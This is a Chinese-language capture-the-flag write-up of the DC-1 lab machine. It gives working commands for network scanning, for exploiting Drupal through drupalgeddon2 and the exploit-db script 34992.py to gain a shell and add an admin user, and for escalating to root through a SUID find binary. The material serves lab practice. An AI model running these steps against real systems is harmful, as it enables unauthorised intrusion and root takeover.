DC-1靶场

靶场下载地址
目标:总共有五个flag,但最终目标是在 root 的主目录中查找并读取thefinalfalg。
前置工作:下载之后用vmvare打开,设置成桥接模式,用的kali也设置成桥接模式

1.开始-nmap扫描

打开DC-1机器,发现需要登陆。这是谜题的一部分,不知道用户名和密码,只能先放着
image.png
进入最常规部分,namp扫描,但是我们不知道DC-1的IP地址
使用 arp-scan快速扫描局域网ip
arp-scan -l 扫描出对应IP和MAC地址
image.png
此处查看MAC地址
image.png
因此192.168.10.151是目标地址
nmap 扫描端口nmap -sV 192.168.10.151(22,80,111开放)
image.png

2.枚举

  • 尝试22端口ssh登陆,失败
  • msf 搜索rpcbind,有一个利用漏洞,但是是拒绝服务攻击,没啥用

访问80端口,是一个页面
image.png
看一下指纹
image.png
使用dirsearch 扫描,发现robots.txt,里面有一些地址,但是一个个进去看,发现没什么用
image.png
接着就转到drupal这个cms上,msf搜索expsearch drupal
image.png
挨个尝试exp, drupalgeddon2拿到了shell。

image.png
输入shell 获取shell
输入python -c 'import pty;pty.spawn("/bin/bash")'获取bash
flag1.txt让我们寻找CMS的配置文件,百度一下
image.png
找到了flag2和默认数据库密码
image.png
它说除了暴力破解,还有其他方法连接数据库
连接数据库没成功,尝试其他方法
发现别人使用searchsploit寻找exp,找到一个增加管理员用户的
image.png
searchsploit -p 34992.py查看详情
image.png
使用cat命令,看一下源码,看看用法
image.png
因此使用python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t [http://192.168.10.151](http://192.168.10.151) -u admin1 -p admin1 来新增一个用户
image.png
使用添加的账号密码登陆
下面发现flag3
image.png
image.png
是让我查看shadow文件吗,普通用户无权限查看

此外,在/home/flag4文件下发现了flag4
image.png

3.提权

LINUX提权之SUID提权篇 - 掘金
flag4暗示我们进行提权,使用find命令查看可以提权的命令(执行一条即可)

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

image.png
就用find提权吧

cd /tmp
touch test
find test -exec /bin/sh \;

whoami显示root权限
image.png
进入root目录,找到最后flag
image.png

posted @ 2023-05-18 20:26  1ink  阅读(63)  评论(0编辑  收藏  举报